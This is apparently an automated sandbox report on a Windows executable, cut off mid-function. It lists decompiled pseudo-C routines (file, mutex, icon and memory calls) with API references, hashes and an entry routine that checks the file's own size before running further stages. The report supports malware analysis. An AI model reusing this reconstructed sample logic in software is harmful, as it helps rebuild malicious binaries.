
                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00404808(void* __eax, CHAR** __edx) {
                                                                                                                          				void* _t7;
                                                                                                                          				long _t9;
                                                                                                                          				long _t10;
                                                                                                                          				CHAR** _t14;
                                                                                                                          				void* _t15;
                                                                                                                          
                                                                                                                          				_t14 = __edx;
                                                                                                                          				_t15 = __eax;
                                                                                                                          				_t10 = E0040320C(__eax);
                                                                                                                          				_t7 = E00403184(__edx, _t10, E0040340C(_t15));
                                                                                                                          				if(_t10 > 0) {
                                                                                                                          					_t9 = CharLowerBuffA( *_t14, _t10); // executed
                                                                                                                          					return _t9;
                                                                                                                          				}
                                                                                                                          				return _t7;
                                                                                                                          			}









                                                                                                                          APIs
                                                                                                                          • CharLowerBuffA.USER32(00000000,00000000,?,?,?,004048BE,00000000,00000000,?,0040558D,00000000,00405611,?,00000000,?,00000000), ref: 00404832
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: BuffCharLower
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2358735015-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00406CA8(void* __eax, int __ecx, void* __edx) {
                                                                                                                          				char* _t6;
                                                                                                                          				void* _t7;
                                                                                                                          				void* _t8;
                                                                                                                          				void* _t11;
                                                                                                                          				int _t16;
                                                                                                                          
                                                                                                                          				_t16 = __ecx;
                                                                                                                          				_t11 = __eax;
                                                                                                                          				E004064E4(__eax);
                                                                                                                          				_t6 = E0040340C(__edx);
                                                                                                                          				_t7 =  *0x40a650; // 0x400000
                                                                                                                          				_t8 = ExtractIconA(_t7, _t6, _t16); // executed
                                                                                                                          				if(_t8 > 1) {
                                                                                                                          					return E00406520(_t11, _t8);
                                                                                                                          				}
                                                                                                                          				return _t8;
                                                                                                                          			}









                                                                                                                          APIs
                                                                                                                            • Part of subcall function 004064E4: DestroyCursor.USER32(00000000), ref: 004064F3
                                                                                                                          • ExtractIconA.SHELL32(00400000,00000000,00000000), ref: 00406CC7
                                                                                                                            • Part of subcall function 00406520: GetIconInfo.USER32(?), ref: 00406540
                                                                                                                            • Part of subcall function 00406520: GetObjectA.GDI32(?,00000018,?), ref: 00406551
                                                                                                                            • Part of subcall function 00406520: DeleteObject.GDI32(?), ref: 00406566
                                                                                                                            • Part of subcall function 00406520: DeleteObject.GDI32(?), ref: 00406574
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Object$DeleteIcon$CursorDestroyExtractInfo
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2619871307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00404F34(void* __eax, void* __edx) {
                                                                                                                          				char _v268;
                                                                                                                          				long _t6;
                                                                                                                          				void* _t13;
                                                                                                                          				void* _t14;
                                                                                                                          
                                                                                                                          				_t13 = __edx;
                                                                                                                          				_t6 = GetShortPathNameA(E0040340C(__eax),  &_v268, 0x104); // executed
                                                                                                                          				return E00403184(_t13, _t6, _t14);
                                                                                                                          			}








                                                                                                                          APIs
                                                                                                                          • GetShortPathNameA.KERNEL32 ref: 00404F52
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: NamePathShort
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1295925010-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 66%
                                                                                                                          			E00404B68(CHAR* __eax, unsigned int __edx) {
                                                                                                                          				CHAR* _t1;
                                                                                                                          				void* _t2;
                                                                                                                          				long _t6;
                                                                                                                          				long _t9;
                                                                                                                          
                                                                                                                          				_t9 = __edx;
                                                                                                                          				_t1 = __eax;
                                                                                                                          				_push(0);
                                                                                                                          				_t6 = __edx >> 0x00000010 & 0x00001fff;
                                                                                                                          				if(_t6 == 0) {
                                                                                                                          					_t6 = 0x80;
                                                                                                                          				}
                                                                                                                          				_t2 = CreateFileA(_t1, 0, _t9, 0, _t9, _t6, ??); // executed
                                                                                                                          				return _t2;
                                                                                                                          			}








                                                                                                                          APIs
                                                                                                                          • CreateFileA.KERNEL32(00408220,80000301,80000301,00000000,80000301,80000301,00000000,00404CB4,00000000,00404CE6), ref: 00404B88
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 823142352-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 68%
                                                                                                                          			E00404018(struct _SECURITY_ATTRIBUTES* _a4, void* _a8, CHAR* _a12) {
                                                                                                                          				void* _t8;
                                                                                                                          
                                                                                                                          				_t4 = _a12;
                                                                                                                          				asm("sbb eax, eax");
                                                                                                                          				_t8 = CreateMutexA(_a4,  &(_a12[1]) & 0x0000007f, _t4); // executed
                                                                                                                          				return _t8;
                                                                                                                          			}




                                                                                                                          0x0040401b
                                                                                                                          0x00404023
                                                                                                                          0x0040402e
                                                                                                                          0x00404034

                                                                                                                          APIs
                                                                                                                          • CreateMutexA.KERNEL32(00408220,00408206,00408205,?,004075E3,00000000,00000000,004091C8,00000000,0040765C,?,?,?,?,00000000,00000000), ref: 0040402E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateMutex
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1964310414-0
                                                                                                                          • Opcode ID: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                                                                                                          • Instruction ID: 31d529539147b31f913da60fb79b32c9d72b995d2910e43382fd7a33128a04fb
                                                                                                                          • Opcode Fuzzy Hash: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                                                                                                          • Instruction Fuzzy Hash: 8AC01273150248ABC700EEA9DC05D9B33DC5758609B008825B618D7100C139E5909B64
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00404B9C() {
                                                                                                                          				void* _t3;
                                                                                                                          				long _t5;
                                                                                                                          				void* _t6;
                                                                                                                          				void* _t10;
                                                                                                                          
                                                                                                                          				_t5 = GetFileAttributesA(E00404490(_t3)); // executed
                                                                                                                          				_t6 = _t5 + 1;
                                                                                                                          				_t10 = _t6;
                                                                                                                          				if(_t10 != 0) {
                                                                                                                          					return _t6 - 0x00000001 & 0 | _t10 == 0x00000000;
                                                                                                                          				}
                                                                                                                          				return _t6;
                                                                                                                          			}








                                                                                                                          APIs
                                                                                                                          • GetFileAttributesA.KERNEL32(00000000,00407EDD,00000000,00408020,?,?,00000000,00000000,?,0040819C,00000000,00408220), ref: 00404BA2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AttributesFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3188754299-0
                                                                                                                          • Opcode ID: f0e2935d6735992bbc1d1517f7f0ae46d2a9bb3647fd1b02a3c043829b286a3b
                                                                                                                          • Instruction ID: b116303671e024f583cda4c1147e2dbfbac77b887c659148fe5224e5fd1b100a
                                                                                                                          • Opcode Fuzzy Hash: f0e2935d6735992bbc1d1517f7f0ae46d2a9bb3647fd1b02a3c043829b286a3b
                                                                                                                          • Instruction Fuzzy Hash: 65A012C682120114CC1071F1220375A0144E4C02CC38448A62350B00C2C83CE501001D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00404BB4(void* __eax, signed int __ecx, long __edx) {
                                                                                                                          				long _t2;
                                                                                                                          
                                                                                                                          				_t2 = SetFilePointer(__eax, __edx, 0, __ecx & 0x000000ff); // executed
                                                                                                                          				return _t2;
                                                                                                                          			}




                                                                                                                          0x00404bbc
                                                                                                                          0x00404bc1

                                                                                                                          APIs
                                                                                                                          • SetFilePointer.KERNEL32(00000000,000003E8,00000000,?,00407179,00000000,004071BF,?,00000000), ref: 00404BBC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FilePointer
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 973152223-0
                                                                                                                          • Opcode ID: 7cf7d094e1152e8ce2a36ef2ea1d814d027d71488bb8302382125c90c8a75838
                                                                                                                          • Instruction ID: 68b303876a78b47fa373b2f01407b4ce5b79aa50a67d4c8f5d0a49418ed6adba
                                                                                                                          • Opcode Fuzzy Hash: 7cf7d094e1152e8ce2a36ef2ea1d814d027d71488bb8302382125c90c8a75838
                                                                                                                          • Instruction Fuzzy Hash: 69A002D85902203AF8182363AC5FF37105C97C0B55FD0855E7351754C164EC6A241039
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0040137C(void* __eax, intOrPtr* __ecx, intOrPtr __edx) {
                                                                                                                          				intOrPtr _v20;
                                                                                                                          				intOrPtr _v24;
                                                                                                                          				void* _v28;
                                                                                                                          				intOrPtr* _v32;
                                                                                                                          				intOrPtr* _t24;
                                                                                                                          				intOrPtr _t27;
                                                                                                                          				intOrPtr _t31;
                                                                                                                          				int _t32;
                                                                                                                          				intOrPtr* _t35;
                                                                                                                          				intOrPtr* _t42;
                                                                                                                          				void* _t43;
                                                                                                                          				void* _t44;
                                                                                                                          				intOrPtr* _t45;
                                                                                                                          
                                                                                                                          				_t45 =  &_v20;
                                                                                                                          				_v32 = __ecx;
                                                                                                                          				 *_t45 = __edx;
                                                                                                                          				_v28 = 0xffffffff;
                                                                                                                          				_v24 = 0;
                                                                                                                          				_t44 = __eax;
                                                                                                                          				_v20 =  *_t45 + __eax;
                                                                                                                          				_t35 =  *0x40a5d4; // 0x40a5d4
                                                                                                                          				while(_t35 != 0x40a5d4) {
                                                                                                                          					_t42 =  *_t35;
                                                                                                                          					_t5 = _t35 + 8; // 0x0
                                                                                                                          					_t43 =  *_t5;
                                                                                                                          					if(_t44 <= _t43) {
                                                                                                                          						_t6 = _t35 + 0xc; // 0x0
                                                                                                                          						if(_t43 +  *_t6 <= _v20) {
                                                                                                                          							if(_t43 < _v28) {
                                                                                                                          								_v28 = _t43;
                                                                                                                          							}
                                                                                                                          							_t10 = _t35 + 0xc; // 0x0
                                                                                                                          							_t31 = _t43 +  *_t10;
                                                                                                                          							if(_t31 > _v24) {
                                                                                                                          								_v24 = _t31;
                                                                                                                          							}
                                                                                                                          							_t32 = VirtualFree(_t43, 0, 0x8000); // executed
                                                                                                                          							if(_t32 == 0) {
                                                                                                                          								 *0x40a5b0 = 1;
                                                                                                                          							}
                                                                                                                          							E00401184(_t35);
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					_t35 = _t42;
                                                                                                                          				}
                                                                                                                          				_t24 = _v32;
                                                                                                                          				 *_t24 = 0;
                                                                                                                          				if(_v24 == 0) {
                                                                                                                          					return _t24;
                                                                                                                          				}
                                                                                                                          				 *_v32 = _v28;
                                                                                                                          				_t27 = _v24 - _v28;
                                                                                                                          				 *((intOrPtr*)(_v32 + 4)) = _t27;
                                                                                                                          				return _t27;
                                                                                                                          			}

















                                                                                                                          APIs
                                                                                                                          • VirtualFree.KERNEL32(FFFFFFFF,00000000,00008000), ref: 004013E0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1263568516-0
                                                                                                                          • Opcode ID: fa7a78eec5dd89a8b83c49400664c27073319ee3a8c610895c3709d3653ec505
                                                                                                                          • Instruction ID: f327295f0dbb7d02968337953404c96d08b75f0734ec548ae522820371e35f3d
                                                                                                                          • Opcode Fuzzy Hash: fa7a78eec5dd89a8b83c49400664c27073319ee3a8c610895c3709d3653ec505
                                                                                                                          • Instruction Fuzzy Hash: CB21E570608741AFD710DF19C880A5FBBE0EB85720F14C96AE8989B7A5D378E841DB5A
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00401434(signed int __eax, void** __ecx, intOrPtr __edx) {
                                                                                                                          				signed int _v20;
                                                                                                                          				void** _v24;
                                                                                                                          				void* _t15;
                                                                                                                          				void** _t16;
                                                                                                                          				void* _t17;
                                                                                                                          				signed int _t27;
                                                                                                                          				intOrPtr* _t29;
                                                                                                                          				void* _t31;
                                                                                                                          				intOrPtr* _t32;
                                                                                                                          
                                                                                                                          				_v24 = __ecx;
                                                                                                                          				 *_t32 = __edx;
                                                                                                                          				_t31 = __eax & 0xfffff000;
                                                                                                                          				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
                                                                                                                          				 *_v24 = _t31;
                                                                                                                          				_t15 = _v20 - _t31;
                                                                                                                          				_v24[1] = _t15;
                                                                                                                          				_t29 =  *0x40a5d4; // 0x40a5d4
                                                                                                                          				while(_t29 != 0x40a5d4) {
                                                                                                                          					_t7 = _t29 + 8; // 0x0
                                                                                                                          					_t17 =  *_t7;
                                                                                                                          					_t8 = _t29 + 0xc; // 0x0
                                                                                                                          					_t27 =  *_t8 + _t17;
                                                                                                                          					if(_t31 > _t17) {
                                                                                                                          						_t17 = _t31;
                                                                                                                          					}
                                                                                                                          					if(_t27 > _v20) {
                                                                                                                          						_t27 = _v20;
                                                                                                                          					}
                                                                                                                          					if(_t27 > _t17) {
                                                                                                                          						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
                                                                                                                          						if(_t15 == 0) {
                                                                                                                          							_t16 = _v24;
                                                                                                                          							 *_t16 = 0;
                                                                                                                          							return _t16;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					_t29 =  *_t29;
                                                                                                                          				}
                                                                                                                          				return _t15;
                                                                                                                          			}













                                                                                                                          APIs
                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 004014A1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4275171209-0
                                                                                                                          • Opcode ID: 6562d44be094aac9c3416d4300413632571bdfff9e6fcfdcc884fc208ae27054
                                                                                                                          • Instruction ID: 651c7d6b6741c998796b49b102b161bb2341ec2eea25b0c045f05b7ed0c0d4f4
                                                                                                                          • Opcode Fuzzy Hash: 6562d44be094aac9c3416d4300413632571bdfff9e6fcfdcc884fc208ae27054
                                                                                                                          • Instruction Fuzzy Hash: E7117072A04701AFC310DF29CD80A2BB7E1EBC4750F15C63DE598673B5D638AC408795
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 94%
                                                                                                                          			E004014C8(void* __eax, void** __ecx, void* __edx) {
                                                                                                                          				int _t7;
                                                                                                                          				void* _t9;
                                                                                                                          				signed int _t14;
                                                                                                                          				intOrPtr* _t19;
                                                                                                                          				signed int _t22;
                                                                                                                          				void** _t23;
                                                                                                                          
                                                                                                                          				_push(__ecx);
                                                                                                                          				 *_t23 = __eax + 0x00000fff & 0xfffff000;
                                                                                                                          				_t22 = __eax + __edx & 0xfffff000;
                                                                                                                          				 *__ecx =  *_t23;
                                                                                                                          				_t7 = _t22 -  *_t23;
                                                                                                                          				__ecx[1] = _t7;
                                                                                                                          				_t19 =  *0x40a5d4; // 0x40a5d4
                                                                                                                          				while(_t19 != 0x40a5d4) {
                                                                                                                          					_t2 = _t19 + 8; // 0x0
                                                                                                                          					_t9 =  *_t2;
                                                                                                                          					_t3 = _t19 + 0xc; // 0x0
                                                                                                                          					_t14 =  *_t3 + _t9;
                                                                                                                          					if(_t9 <  *_t23) {
                                                                                                                          						_t9 =  *_t23;
                                                                                                                          					}
                                                                                                                          					if(_t22 < _t14) {
                                                                                                                          						_t14 = _t22;
                                                                                                                          					}
                                                                                                                          					if(_t14 > _t9) {
                                                                                                                          						_t7 = VirtualFree(_t9, _t14 - _t9, 0x4000); // executed
                                                                                                                          						if(_t7 == 0) {
                                                                                                                          							 *0x40a5b0 = 2;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					_t19 =  *_t19;
                                                                                                                          				}
                                                                                                                          				return _t7;
                                                                                                                          			}










                                                                                                                          APIs
                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00004000,?,?,?,00000000,00004003,0040172F), ref: 00401522
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1263568516-0
                                                                                                                          • Opcode ID: 366ed2c7ca182d6b4595971b05bf8940527af6e3e06c25c2a4c3263d2ce5472b
                                                                                                                          • Instruction ID: c2f9954cc8299db513f2c37eb2bc070e0fd4fafed15322d1c8bcd52f3136bf23
                                                                                                                          • Opcode Fuzzy Hash: 366ed2c7ca182d6b4595971b05bf8940527af6e3e06c25c2a4c3263d2ce5472b
                                                                                                                          • Instruction Fuzzy Hash: E501F7736043006FC3109E28DDC092A77A4EBC5324F15053EDA85AB3A1D73AAC0587A8
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 31%
                                                                                                                          			E004070DC(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                          				char _v8;
                                                                                                                          				intOrPtr _t19;
                                                                                                                          				intOrPtr _t24;
                                                                                                                          
                                                                                                                          				_push(0);
                                                                                                                          				_push(_t24);
                                                                                                                          				_push(0x407126);
                                                                                                                          				_push( *[fs:eax]);
                                                                                                                          				 *[fs:eax] = _t24;
                                                                                                                          				E004049D0(0, __ebx,  &_v8, __edi, __esi); // executed
                                                                                                                          				E00404C78(E0040340C(_v8), __ebx, 0xa200, 0x40a698, __edi, __esi); // executed
                                                                                                                          				_pop(_t19);
                                                                                                                          				 *[fs:eax] = _t19;
                                                                                                                          				_push(E0040712D);
                                                                                                                          				return E00403094( &_v8);
                                                                                                                          			}







                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileModuleName
                                                                                                                          • String ID: MZP
                                                                                                                          • API String ID: 514040917-2889622443
                                                                                                                          • Opcode ID: 41121ee7b25dade0bc9d433c7374af51b0025473e269c79932b73fc9af909746
                                                                                                                          • Instruction ID: dbacf8f9bda0d2f3624fed2e55e69454661720eb62c3ca271fb24a4619442e3b
                                                                                                                          • Opcode Fuzzy Hash: 41121ee7b25dade0bc9d433c7374af51b0025473e269c79932b73fc9af909746
                                                                                                                          • Instruction Fuzzy Hash: 32E09270708304AFE701EB72DC13A19B7ACD78A704FA24877E600AA6D1DA7DAE118519
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00404B90(void* __eax) {
                                                                                                                          				signed int _t4;
                                                                                                                          
                                                                                                                          				_t4 = CloseHandle(__eax); // executed
                                                                                                                          				return _t4 & 0xffffff00 | _t4 != 0x00000000;
                                                                                                                          			}




                                                                                                                          0x00404b91
                                                                                                                          0x00404b9b

                                                                                                                          APIs
                                                                                                                          • CloseHandle.KERNEL32(00000000,00404CD0,00000000,00404CE6), ref: 00404B91
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseHandle
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2962429428-0
                                                                                                                          • Opcode ID: ef71f196dd3e8bd5321f6bf3e93503307ae4868d30203b0da39ae7c2a7e1010a
                                                                                                                          • Instruction ID: f540dd3953723152695a7cfd94b4b723d26dbf970bde7b3718d3bc06e0259ed2
                                                                                                                          • Opcode Fuzzy Hash: ef71f196dd3e8bd5321f6bf3e93503307ae4868d30203b0da39ae7c2a7e1010a
                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 82%
                                                                                                                          			_entry_(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                                                                                          				void* _v24;
                                                                                                                          				char _v28;
                                                                                                                          				void* _v32;
                                                                                                                          				char _v36;
                                                                                                                          				intOrPtr _t26;
                                                                                                                          				void* _t36;
                                                                                                                          				void* _t47;
                                                                                                                          				void* _t48;
                                                                                                                          				intOrPtr _t71;
                                                                                                                          				void* _t79;
                                                                                                                          				void* _t81;
                                                                                                                          				void* _t86;
                                                                                                                          
                                                                                                                          				_t86 = __fp0;
                                                                                                                          				_t81 = __eflags;
                                                                                                                          				_t76 = __esi;
                                                                                                                          				_t75 = __edi;
                                                                                                                          				_t54 = __ebx;
                                                                                                                          				_v36 = 0;
                                                                                                                          				_v28 = 0;
                                                                                                                          				_v32 = 0;
                                                                                                                          				_v24 = 0;
                                                                                                                          				E00403F14(0x408054);
                                                                                                                          				_push(_t79);
                                                                                                                          				_push(0x408220);
                                                                                                                          				_push( *[fs:eax]);
                                                                                                                          				 *[fs:eax] = _t79 + 0xffffffe0;
                                                                                                                          				E00407080(0x4091a8, 0xb, 0xb);
                                                                                                                          				E00407080(0x4091b4, 9, 9);
                                                                                                                          				E00407080(0x4091c0, 3, 3);
                                                                                                                          				E00407080(0x4091dc, 3, 3);
                                                                                                                          				_t26 =  *0x409210; // 0x40919c
                                                                                                                          				E00407080(_t26, 0xb, 0xb); // executed
                                                                                                                          				E004070DC(__ebx, __edi, __esi, _t81); // executed
                                                                                                                          				E004049D0(0, __ebx,  &_v24, __edi, __esi);
                                                                                                                          				if(E00404F6C(_v24) > 0xa200) {
                                                                                                                          					E00407678(_t54, _t75, _t76); // executed
                                                                                                                          				}
                                                                                                                          				E00407E90(_t54, _t75, _t76); // executed
                                                                                                                          				_t60 = 3;
                                                                                                                          				_t70 = 3;
                                                                                                                          				E00407080(0x4091c4, 3, 3);
                                                                                                                          				_t36 = E00404AE8(_t54, _t75, _t76);
                                                                                                                          				_t83 = _t36;
                                                                                                                          				if(_t36 != 0) {
                                                                                                                          					E004049D0(0, _t54,  &_v28, _t75, _t76);
                                                                                                                          					_push(_v28);
                                                                                                                          					_t60 = 3;
                                                                                                                          					E004031F4( &_v32, 3, 0x4091c4);
                                                                                                                          					_t70 = _v32;
                                                                                                                          					_pop(_t47);
                                                                                                                          					_t48 = E00406FE4(_t47, _t54, _v32, _t83);
                                                                                                                          					_t84 = _t48;
                                                                                                                          					if(_t48 != 0) {
                                                                                                                          						_t70 =  &_v36;
                                                                                                                          						E004049D0(1, _t54,  &_v36, _t75, _t76);
                                                                                                                          						E00407D9C(_v36, _t54,  &_v36, _t75, _t76); // executed
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				E004079A0(_t54, _t75, _t76, _t84); // executed
                                                                                                                          				E0040759C(_t54, _t60, _t70, _t75, _t76, _t84, _t86); // executed
                                                                                                                          				_pop(_t71);
                                                                                                                          				 *[fs:eax] = _t71;
                                                                                                                          				_push(0x408227);
                                                                                                                          				return E004030B8( &_v36, 4);
                                                                                                                          			}
















                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileFindModule$CloseFirstHandleName
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2572062711-0
                                                                                                                          • Opcode ID: dd04900b1eda66457b3e54522726fafad356c8816e377336a90270cb981f17ff
                                                                                                                          • Instruction ID: ce7274d5a0203330cd45a7cf6d0e011d083bf460e717dce8afa0a39e5ced3773
                                                                                                                          • Opcode Fuzzy Hash: dd04900b1eda66457b3e54522726fafad356c8816e377336a90270cb981f17ff
                                                                                                                          • Instruction Fuzzy Hash: D4211E70B142054BEB40B7B6C95279F76A5DB88304F50493FE544BB3C2DA3DAD0586AE
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 60%
                                                                                                                          			E004074B4(intOrPtr __eax, void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                          				intOrPtr _v8;
                                                                                                                          				char _v12;
                                                                                                                          				char _v16;
